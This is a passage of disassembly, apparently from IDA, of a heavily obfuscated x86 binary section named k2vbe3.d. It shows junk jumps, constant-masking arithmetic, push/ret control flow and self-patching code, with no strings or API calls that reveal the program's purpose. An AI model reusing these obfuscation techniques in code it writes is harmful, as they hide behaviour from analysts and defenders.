; END OF FUNCTION CHUNK	FOR sub_4504F3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F34C

loc_43C1B4:				; CODE XREF: sub_43F34C+13j
		jnz	loc_4534AB
		jmp	loc_454CE4
; END OF FUNCTION CHUNK	FOR sub_43F34C
; ---------------------------------------------------------------------------

loc_43C1BF:				; CODE XREF: k2vbe3.d:00442881j
		jge	loc_440C08

; =============== S U B	R O U T	I N E =======================================



sub_43C1C5	proc near		; CODE XREF: k2vbe3.d:004406F1p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00440938 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00452514 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00456300 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459A2F SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		xor	edi, 0C887CAFAh
		xchg	edi, [esp-4+arg_0]
		jmp	loc_459A2F
sub_43C1C5	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43C1D7:				; CODE XREF: k2vbe3.d:loc_4446BCj
		push	ebx
		push	0F9551DD0h
		pop	ebx
		add	ebx, 0C946D099h
		xor	ebx, 0C29BEF69h
		jmp	loc_43E278
; ---------------------------------------------------------------------------

loc_43C1EF:				; CODE XREF: k2vbe3.d:004512D3j
					; k2vbe3.d:loc_45B573j
		push	0E6BD6D7Fh
		pop	eax
		or	eax, 5EF57905h
		test	eax, 10000h
		jmp	loc_45C1AF

; =============== S U B	R O U T	I N E =======================================



sub_43C206	proc near		; CODE XREF: sub_4471DC+10p
					; sub_44C9DC+Dp ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0044684E SIZE 00000005 BYTES

		push	ebx
		push	ebp
		pop	ebx
		xchg	ebx, [esp+4+var_4]
		push	offset sub_440C94
		jmp	loc_44684E
sub_43C206	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4582DD

loc_43C216:				; CODE XREF: sub_4582DD:loc_4596B2j
		push	edx
		push	eax
		jmp	loc_44AF39
; END OF FUNCTION CHUNK	FOR sub_4582DD
; ---------------------------------------------------------------------------

loc_43C21D:				; CODE XREF: k2vbe3.d:0043DDC8j
		add	eax, [esp]
		adc	edx, [esp+4]
		jmp	loc_44B04E
; ---------------------------------------------------------------------------
		jmp	ds:dword_41E068
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4445E2

loc_43C22F:				; CODE XREF: sub_4445E2+17j
		jmp	loc_459118
; END OF FUNCTION CHUNK	FOR sub_4445E2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_473. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		jo	loc_44A6CA
		mov	eax, [esp]
		push	offset loc_459D45
		jmp	locret_45B6A6

; =============== S U B	R O U T	I N E =======================================



sub_43C248	proc near		; CODE XREF: k2vbe3.d:00441611j
					; sub_451EB7+4A92p

; FUNCTION CHUNK AT 004587DE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B739 SIZE 00000014 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		mov	ds:byte_4411F0,	1
		lea	eax, [ebp-14h]
		xor	edx, edx
		jmp	loc_4587DE
sub_43C248	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_43C25D:				; CODE XREF: sub_44C90E:loc_452296j
		and	eax, 24DE306Bh
		xchg	esi, [eax]
		jmp	loc_452762
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------

loc_43C26A:				; CODE XREF: k2vbe3.d:0043D6DDj
		jo	loc_446788

loc_43C270:				; CODE XREF: k2vbe3.d:loc_43D6C7j
		add	ebx, 104CFB18h
		mov	[ebx], eax
		pop	ebx
		retn
; ---------------------------------------------------------------------------

loc_43C27A:				; CODE XREF: k2vbe3.d:004495EBj
		jmp	loc_4401C2
; ---------------------------------------------------------------------------
		push	ebp
		jmp	sub_44C678
; ---------------------------------------------------------------------------

loc_43C285:				; CODE XREF: k2vbe3.d:loc_44A49Bj
					; k2vbe3.d:0044A4A9j
		add	edx, 0B450E682h
		cmp	edx, 688815F4h
		jmp	loc_445456
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AFD4

loc_43C296:				; CODE XREF: sub_44AFD4:loc_44AFDFj
		or	edi, 0FEDD8FF3h
		mov	[edi], ebx
		pushf
		adc	edi, 5AA02884h

loc_43C2A5:				; CODE XREF: sub_44C1BD:loc_4431B0j
		jmp	loc_4507FC
; END OF FUNCTION CHUNK	FOR sub_44AFD4
; ---------------------------------------------------------------------------

loc_43C2AA:				; CODE XREF: k2vbe3.d:0044A9D7j
		mov	eax, [esp]
		push	ebx
		push	edx
		pop	ebx
		xchg	ebx, [esp]
		call	sub_44F49C
		jmp	loc_459F0A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C1BD

loc_43C2BD:				; CODE XREF: sub_44C1BD:loc_44C3F3j
		jz	loc_457817
		jmp	loc_44964F
; END OF FUNCTION CHUNK	FOR sub_44C1BD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446CCF

loc_43C2C8:				; CODE XREF: sub_446CCF:loc_4587BDj
		jnz	loc_44D5FC
		mov	eax, [ebp-20h]
		mov	byte ptr [eax],	64h
		inc	dword ptr [ebp-20h]
		mov	eax, [ebp-20h]
		jmp	loc_44CF0F
; END OF FUNCTION CHUNK	FOR sub_446CCF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456C15

loc_43C2DF:				; CODE XREF: sub_456C15:loc_4498A1j
		jnz	loc_43CA4F

loc_43C2E5:				; CODE XREF: sub_4521CB+54D6j
		jmp	sub_4436CE
; END OF FUNCTION CHUNK	FOR sub_456C15
; ---------------------------------------------------------------------------
		adc	edi, ebp
		mov	edx, [ebx]
		pushf
		jmp	loc_43CA4F
; ---------------------------------------------------------------------------

loc_43C2F4:				; DATA XREF: k2vbe3.d:loc_4546D6o
		push	0FFFFFFFFh
		push	ebx
		push	505B68F8h
		pop	ebx
		xor	ebx, 0D537DE0Fh
		add	ebx, 0E88BBF92h
		jmp	loc_442C6E
; ---------------------------------------------------------------------------
		rol	eax, 18h
		jmp	sub_444E90
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E83

loc_43C316:				; CODE XREF: sub_454E83:loc_45A799j
		push	3BD2CA1Ah
		pop	eax
		and	eax, 0B3AFAD47h
		test	eax, 8
		jmp	loc_44D7F7
; END OF FUNCTION CHUNK	FOR sub_454E83
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F174

loc_43C32D:				; CODE XREF: sub_44F174-C0A0j
		push	ecx
		jmp	loc_446E16
; END OF FUNCTION CHUNK	FOR sub_44F174
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444EFA

loc_43C333:				; CODE XREF: sub_444EFA:loc_45BBC9j
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_446E16
		jmp	loc_43CD0C
; END OF FUNCTION CHUNK	FOR sub_444EFA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E83

loc_43C347:				; CODE XREF: sub_454E83:loc_45428Aj
		jge	loc_45C290

loc_43C34D:				; CODE XREF: sub_443A30:loc_4573F9j
					; k2vbe3.d:0045787Fj
		jmp	loc_43D7C8
; END OF FUNCTION CHUNK	FOR sub_454E83
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D4B

loc_43C352:				; CODE XREF: sub_457D4B-53B4j
		jmp	sub_43F2E0
; END OF FUNCTION CHUNK	FOR sub_457D4B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459DA3

loc_43C357:				; CODE XREF: sub_459DA3-18787j
		jmp	loc_4545E3
; END OF FUNCTION CHUNK	FOR sub_459DA3
; ---------------------------------------------------------------------------
		mov	esi, [ecx]
		test	ebp, eax
		jmp	loc_45C28A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E90D

loc_43C365:				; CODE XREF: sub_44E90D:loc_44C819j
		pop	eax
		rol	eax, 10h
		add	eax, 5176A6Fh
		sub	eax, 2D13A550h
		and	eax, 0AAB22B63h
		xor	eax, 22802372h
		call	sub_44BA05
		push	esi
		jmp	loc_4445D3
; END OF FUNCTION CHUNK	FOR sub_44E90D
; ---------------------------------------------------------------------------

loc_43C38C:				; CODE XREF: k2vbe3.d:004527E1j
		call	sub_43C04E
		call	sub_451287
; START	OF FUNCTION CHUNK FOR sub_45C0CD

loc_43C396:				; CODE XREF: sub_45C0CD:loc_43CE67j
		mov	esp, ebp
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_45C0CD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DEBE

loc_43C39A:				; CODE XREF: sub_43DEBE+2420j
					; sub_441D41:loc_45696Dj
		jmp	loc_447497
; END OF FUNCTION CHUNK	FOR sub_43DEBE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446964

loc_43C39F:				; CODE XREF: sub_446964-3F94j
		rol	eax, 7
		push	eax
		retn
; END OF FUNCTION CHUNK	FOR sub_446964
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A1B1

loc_43C3A4:				; CODE XREF: sub_44A1B1-4343j
		jmp	nullsub_110
; END OF FUNCTION CHUNK	FOR sub_44A1B1

; =============== S U B	R O U T	I N E =======================================



sub_43C3A9	proc near		; CODE XREF: sub_4469E1:loc_45B524p

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043E8B3 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043ECC1 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00442039 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00442119 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00443482 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448997 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044903B SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00449531 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449958 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00449F7B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A076 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A324 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044A938 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044D89A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044D943 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044E266 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044E727 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F890 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450479 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00451D46 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 004537A1 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00455118 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004557BE SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045671C SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004567FA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457227 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0045732B SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00457BA4 SIZE 0000002A BYTES
; FUNCTION CHUNK AT 00458EB7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459548 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045A0A9 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0045A14E SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0045A8CD SIZE 0000000E BYTES

		push	edx
		mov	edx, ebp
		jmp	loc_4567FA
sub_43C3A9	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457E9C

loc_43C3B1:				; CODE XREF: sub_457E9C+Aj
		pop	ebx
		or	ebx, 9918AAA1h
		xor	ebx, 90B70E33h
		jns	loc_45AC55
; END OF FUNCTION CHUNK	FOR sub_457E9C
; START	OF FUNCTION CHUNK FOR sub_43E204

loc_43C3C4:				; CODE XREF: sub_43E204+3702j
		jmp	loc_43F5BF
; END OF FUNCTION CHUNK	FOR sub_43E204
; ---------------------------------------------------------------------------

loc_43C3C9:				; CODE XREF: k2vbe3.d:0043D987j
		jmp	loc_450BD6
; ---------------------------------------------------------------------------
		sub	ebx, edx
		jmp	loc_43E707
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DFE1

loc_43C3D5:				; CODE XREF: sub_43DFE1:loc_4513ADj
		xchg	ebp, [esp+0]
		mov	edi, ebp
		pop	ebp
		xor	eax, 8E960510h
		jnz	loc_459EDC
		ror	eax, 0Fh
		xor	eax, 0DC5CC9F6h
		mov	edx, [esp-4+arg_0]
		jmp	loc_442CFF
; END OF FUNCTION CHUNK	FOR sub_43DFE1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FE0A

loc_43C3F8:				; CODE XREF: sub_43FE0A+80DEj
		cmp	byte ptr [eax],	0
		jnz	loc_441DFB
		mov	eax, [ebp-4]
		mov	[ebp-0Ch], eax
		shl	dword ptr [ebp-8], 8
		jmp	loc_452A51
; ---------------------------------------------------------------------------

loc_43C410:				; CODE XREF: sub_43FE0A:loc_447EDFj
		mov	eax, [ebp-0Ch]
		jmp	loc_457B78
; END OF FUNCTION CHUNK	FOR sub_43FE0A

; =============== S U B	R O U T	I N E =======================================



sub_43C418	proc near		; CODE XREF: sub_453AE8+1p
					; k2vbe3.d:0045C1DFj
		xchg	esi, [esp+0]
		pop	esi
		mov	eax, [ebp+8]
		cmp	dword ptr [eax-1Ch], 0F6h
		setz	al
		call	sub_456A5F
		call	sub_45649E

loc_43C433:				; CODE XREF: k2vbe3.d:0044E3BBj
		jmp	nullsub_20
sub_43C418	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43C438:				; CODE XREF: k2vbe3.d:0044800Cj
		jmp	locret_44F9F0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447D2E

loc_43C43D:				; CODE XREF: sub_447D2E:loc_447D3Fj
		jmp	loc_447624
; END OF FUNCTION CHUNK	FOR sub_447D2E
; ---------------------------------------------------------------------------

loc_43C442:				; CODE XREF: k2vbe3.d:loc_45A0A4j
		push	ebx
		mov	ebx, ebp
		xchg	ebx, [esp]
		push	edx
		pop	ebp
		xchg	ebp, [esp]
		jmp	loc_43EFE9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E647

loc_43C452:				; CODE XREF: sub_44E647+9j
		pop	ecx
		xor	ecx, 0F2C8720Eh
		and	ecx, 713B7F59h
		test	ecx, 40000h
		jmp	loc_440D45
; END OF FUNCTION CHUNK	FOR sub_44E647
; ---------------------------------------------------------------------------

loc_43C46A:				; CODE XREF: k2vbe3.d:0045A55Fj
		jbe	loc_455101
		shl	ebp, 0Ch
		push	939F85C1h

loc_43C478:				; CODE XREF: k2vbe3.d:loc_449685j
		not	edx
; START	OF FUNCTION CHUNK FOR sub_452CF7

loc_43C47A:				; CODE XREF: sub_452CF7:loc_45A548j
		xor	eax, 29EB4BC5h
		add	eax, 0E339A7B6h

loc_43C486:				; CODE XREF: k2vbe3.d:00456F3Bj
		xor	eax, 9B5BB022h
		jmp	loc_447D85
; END OF FUNCTION CHUNK	FOR sub_452CF7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446CE6

loc_43C491:				; CODE XREF: sub_446CE6+7E54j
		test	edx, 54B695E8h
		jmp	loc_43FBA9
; END OF FUNCTION CHUNK	FOR sub_446CE6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_43C49C:				; CODE XREF: k2vbe3.d:loc_43DF14j
					; sub_44C90E-7DE9j
		push	offset loc_43D8F8
		jmp	nullsub_361
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------

loc_43C4A6:				; CODE XREF: k2vbe3.d:00458D29j
		and	esi, 0BFD6E51Ah
		jmp	loc_447BA8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45530F

loc_43C4B1:				; CODE XREF: sub_45530F:loc_444095j
		push	0AA833C6Ah
		pop	ebx
		xor	ebx, 8A5EBDB4h
		rol	ebx, 1Bh
		add	ebx, 5FC7B686h
		sub	ebx, 0AEEB5A00h
		jb	loc_449122
; END OF FUNCTION CHUNK	FOR sub_45530F
; START	OF FUNCTION CHUNK FOR sub_4468FE

loc_43C4D2:				; CODE XREF: sub_4468FE+3DBAj
		jmp	loc_43CB55
; END OF FUNCTION CHUNK	FOR sub_4468FE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442C22

loc_43C4D7:				; CODE XREF: sub_442C22+12j
		jmp	loc_456D61
; END OF FUNCTION CHUNK	FOR sub_442C22
; ---------------------------------------------------------------------------
		shl	ebp, 10h
		jmp	loc_449120
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_371. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45530F

loc_43C4E5:				; CODE XREF: sub_45530F:loc_43E5AEj
					; sub_44DCC0:loc_44884Ej ...
		mov	edi, [edi]
		add	eax, edi
		pop	edi
		call	sub_4402FA
		cmp	eax, [ebp-0Ch]
		jnz	loc_44A38C
		jmp	loc_44F4AE
; END OF FUNCTION CHUNK	FOR sub_45530F
; ---------------------------------------------------------------------------
		mov	eax, 0E211C416h
		call	sub_43C82E
		push	ebx
		push	0A72555B6h
		pop	ebx
		jmp	loc_45BE00
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449312

loc_43C513:				; CODE XREF: sub_449312:loc_43F9E9j
		jnz	loc_447808
		jmp	loc_43F238
; END OF FUNCTION CHUNK	FOR sub_449312
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44471B

loc_43C51E:				; CODE XREF: sub_44471B+8173j
		jl	loc_456954

loc_43C524:				; CODE XREF: sub_45649E-3057j
		jmp	loc_43FB04
; END OF FUNCTION CHUNK	FOR sub_44471B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B15C

loc_43C529:				; CODE XREF: sub_44B15C:loc_44B16Bj
		jmp	nullsub_64
; END OF FUNCTION CHUNK	FOR sub_44B15C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44249A

loc_43C52E:				; CODE XREF: sub_44249A+16j
		jmp	loc_43E186
; END OF FUNCTION CHUNK	FOR sub_44249A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451222

loc_43C533:				; CODE XREF: sub_451222-F45Bj
		jmp	loc_44AE5D
; END OF FUNCTION CHUNK	FOR sub_451222
; ---------------------------------------------------------------------------
		push	1F256112h
		or	edx, 8EAAEF15h
		jmp	loc_456953
; ---------------------------------------------------------------------------

loc_43C548:				; CODE XREF: k2vbe3.d:loc_455025j
		mov	byte ptr [eax],	87h
		xchg	ebp, [esp]
		mov	eax, ebp
		pop	ebp
		jmp	loc_448038
; ---------------------------------------------------------------------------
		adc	edi, eax
		jmp	sub_4461A0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B4A2

loc_43C55D:				; CODE XREF: sub_45B4A2:loc_44E684j
		jz	loc_441C91
		jmp	loc_446CBA
; END OF FUNCTION CHUNK	FOR sub_45B4A2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F42B

loc_43C568:				; CODE XREF: sub_44F42B-F6EBj
		or	edx, 0A34A75C8h
		or	ebx, eax

loc_43C570:				; CODE XREF: sub_44F42B:loc_4575CEj
		call	sub_45AA57
		push	22124241h
		pop	edx
		jmp	loc_454980
; END OF FUNCTION CHUNK	FOR sub_44F42B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E135

loc_43C580:				; CODE XREF: sub_44B2D7:loc_43EAAFj
					; sub_43E135+1424j
		cmp	al, 0A4h
		jz	loc_4403AD
		jmp	loc_44044D
; END OF FUNCTION CHUNK	FOR sub_43E135
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451CF1

loc_43C58D:				; CODE XREF: sub_451CF1:loc_45BD5Dj
		push	11730FDBh
		pop	esi
		sub	esi, 79650AEh
		test	esi, 40h
		jmp	loc_4548D5
; END OF FUNCTION CHUNK	FOR sub_451CF1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44128B

loc_43C5A4:				; CODE XREF: sub_44128B:loc_44A36Aj
		jz	loc_43FAB1

loc_43C5AA:				; CODE XREF: sub_43FE19+Cj
		jmp	loc_450979
; END OF FUNCTION CHUNK	FOR sub_44128B
; ---------------------------------------------------------------------------
		mov	ebx, esi
		ja	loc_446B03
; START	OF FUNCTION CHUNK FOR sub_457D4B

loc_43C5B7:				; CODE XREF: sub_457D4B:loc_45AD00j
		or	edi, esi
		xchg	edx, [eax]
		jmp	loc_43FAB1
; END OF FUNCTION CHUNK	FOR sub_457D4B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B359

loc_43C5C0:				; CODE XREF: sub_44B359+Cj
		push	0E524470Fh
		pop	ecx
		xor	ecx, 785F13Ah
		sub	ecx, ds:4000ECh
		rol	ecx, 1Bh
		xor	ecx, 0BA4A0B50h
		add	ecx, 0B39BC43Ch
		jmp	loc_441EAB
; END OF FUNCTION CHUNK	FOR sub_44B359
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4575DF

loc_43C5E6:				; CODE XREF: sub_4575DF+10j
		or	edx, 595AE17Eh
		test	edx, 20000h
		jmp	loc_4563D1
; END OF FUNCTION CHUNK	FOR sub_4575DF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_196. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4529D2

loc_43C5F8:				; CODE XREF: sub_4529D2+2783j
		jmp	loc_454CBC
; END OF FUNCTION CHUNK	FOR sub_4529D2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442DF0

loc_43C5FD:				; CODE XREF: sub_442DF0+89A5j
		jmp	loc_442F72
; END OF FUNCTION CHUNK	FOR sub_442DF0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44811E

loc_43C602:				; CODE XREF: sub_44811E+Aj
		jmp	loc_4422A1
; END OF FUNCTION CHUNK	FOR sub_44811E
; ---------------------------------------------------------------------------

loc_43C607:				; DATA XREF: sub_44D863-CD88o
		add	eax, ebp
		add	eax, 0AC0881D9h
		mov	eax, [eax]
		push	ebp
		jmp	loc_44539B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DB59

loc_43C617:				; CODE XREF: sub_44DB59+4j
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_453FA9
		jmp	loc_453CE8
; END OF FUNCTION CHUNK	FOR sub_44DB59
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450983

loc_43C62B:				; CODE XREF: sub_450983-CC49j
		jz	loc_45C1E4
		jno	loc_442A1F
		or	edx, ebp
		jg	loc_43DF61
		jmp	loc_45AE6F
; END OF FUNCTION CHUNK	FOR sub_450983
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_216. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_43C645:				; CODE XREF: sub_44B94B-1E1Aj
		jmp	loc_43D012
; END OF FUNCTION CHUNK	FOR sub_44B94B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_43C64A:				; CODE XREF: sub_440C94:loc_44F228j
		jo	loc_44BD27
		jmp	loc_43D58A
; END OF FUNCTION CHUNK	FOR sub_440C94
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C089

loc_43C655:				; CODE XREF: sub_45C089+Ej
		and	eax, 7
		push	ecx
		push	8A6BA1B9h
		pop	ecx
		jmp	loc_444B43
; END OF FUNCTION CHUNK	FOR sub_45C089
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454903

loc_43C664:				; CODE XREF: sub_454903:loc_44B85Bj
		sub	ebx, 316A5ECFh
		add	ebx, 0D905F396h
		xor	eax, ebx
		pop	ebx
		add	eax, 75D6730Ch
		jmp	loc_448549
; END OF FUNCTION CHUNK	FOR sub_454903
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4551AC

loc_43C67E:				; CODE XREF: sub_4551AC+13j
		sub	eax, 7C6624Eh
		push	offset loc_456E01
		jmp	nullsub_180
; END OF FUNCTION CHUNK	FOR sub_4551AC

; =============== S U B	R O U T	I N E =======================================



sub_43C68E	proc near		; DATA XREF: sub_4561C3-E7B7o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043ED99 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446B6F SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00451B66 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00451CA7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458662 SIZE 00000013 BYTES

		cmp	ds:dword_44BD18, 0
		jnz	loc_4551B3
		jmp	loc_451CA7
sub_43C68E	endp

; ---------------------------------------------------------------------------

loc_43C6A0:				; DATA XREF: sub_445060+5o
		push	eax
		push	0B8E384EDh
		pop	eax
		rol	eax, 13h
		sub	eax, 79CF9C5Ah
		add	eax, 0F4B03E28h
		xor	eax, 6C2E21B3h
; START	OF FUNCTION CHUNK FOR sub_44B2D7

loc_43C6BC:				; CODE XREF: sub_44B2D7:loc_44FAD4j
		add	eax, 31E53A1Fh
		jmp	loc_44D52C
; END OF FUNCTION CHUNK	FOR sub_44B2D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4467A1

loc_43C6C7:				; CODE XREF: sub_4467A1-945Cj
		not	ecx
		jo	loc_452DB3
		sub	ebx, edx
		pop	edi
		jmp	loc_441CEB
; END OF FUNCTION CHUNK	FOR sub_4467A1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F71

loc_43C6D7:				; CODE XREF: sub_450F71-14173j
		add	eax, 0A0D072D3h
		push	ecx
		push	81D62CD1h
		pop	ecx
		or	ecx, 5B122B9Ch
		rol	ecx, 14h
		jmp	loc_45928B
; END OF FUNCTION CHUNK	FOR sub_450F71
; ---------------------------------------------------------------------------
		sbb	eax, 0C06DA056h
		jmp	loc_449E59
; ---------------------------------------------------------------------------

loc_43C6FD:				; CODE XREF: k2vbe3.d:0045AF70j
		cmp	edi, edx
		jmp	loc_44B661
; ---------------------------------------------------------------------------
		mov	ds:off_41E0B0, eax
		lea	eax, sub_44B39A
		mov	byte ptr [eax],	0C3h
		jmp	sub_44B39A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B39A

loc_43C718:				; CODE XREF: sub_44B39Aj
		call	sub_44BECA

loc_43C71D:				; CODE XREF: k2vbe3.d:loc_4531B3j
		pop	ebx
		mov	eax, [esp-4+arg_0]
		push	edx
		push	edi
		push	261336E7h
		jmp	loc_446A3F
; END OF FUNCTION CHUNK	FOR sub_44B39A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453AE8

loc_43C72D:				; CODE XREF: sub_453AE8:loc_458EFCj
		jz	loc_441F93
		jmp	loc_44AC13
; END OF FUNCTION CHUNK	FOR sub_453AE8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4504F3

loc_43C738:				; CODE XREF: sub_4504F3:loc_449176j
		jl	loc_44B5EB
		mov	[ecx], edx
		jmp	loc_44B5E9
; END OF FUNCTION CHUNK	FOR sub_4504F3

; =============== S U B	R O U T	I N E =======================================



sub_43C745	proc near		; CODE XREF: sub_4542E1+6p
					; k2vbe3.d:00456C47j

; FUNCTION CHUNK AT 0044DB71 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00452345 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004534DF SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0045A104 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045AF59 SIZE 00000015 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		mov	eax, [eax]
		add	eax, [ebp-4]
		jmp	loc_4534DF
sub_43C745	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43C753:				; CODE XREF: k2vbe3.d:0045B352j
		pop	esi
		jmp	loc_4566A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C82E

loc_43C759:				; CODE XREF: sub_43C82E:loc_44D9FDj
		jz	loc_4476C7
		jmp	loc_45A678
; END OF FUNCTION CHUNK	FOR sub_43C82E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_189. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43C765:				; CODE XREF: k2vbe3.d:loc_4531A8j
		or	edx, 33A3DD25h
		add	edx, 8C98FB59h
